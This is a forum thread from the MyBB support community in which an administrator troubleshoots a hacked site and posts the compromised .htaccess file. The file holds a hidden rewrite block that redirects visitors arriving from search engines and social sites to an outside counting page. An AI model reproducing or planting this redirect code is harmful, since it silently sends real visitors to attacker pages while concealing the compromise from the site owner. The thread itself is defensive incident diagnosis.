MyBB Community Forums

Full Version: whatever you press an 'ok' message appears.
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
Follow this guidance: http://community.mybb.com/thread-110890.html
Not all steps are required (in your case you have to go through the whole 2 and maybe 1) but I recommend to read everything carefully.
Also check if you use any vulnerable plugins and deinstall/update them: http://community.mybb.com/thread-133659.html
Hello all thanks for the helps,

I'm the administrator for the site and I have:

1. disabled all plugins - nothing
2. searched for that screwattack url link in all of my forum files w/ notepad++ and found nothing
3. found no strange lines in code
4. I did file verification check and it said almost all of the files were modified...

The most recent thing I did was a month ago I updated mybb from 1.6.6 to 1.6.10 and it seemed to have worked fine since then.

I am wondering if I have to see if they injected or modified code in the database side of mybb?

edit: also where do I find the header and footer?

Thanks

Upon further searching I found the offending file:

It's the .htaccess file under the main www directory.

Here is its contents
Quote:#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://screwaholic.com/savas_mazlum/count.php [R=301,L]
</IfModule>

#/0c0896#

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Any ideas on how they were able to edit this file to have the malicious redirects?

Thanks for all the helps!
Any ideas? So we can be aware of this?

Thanks.
^ server log should have the clue(s)
Okay thanks in advance!
Pages: 1 2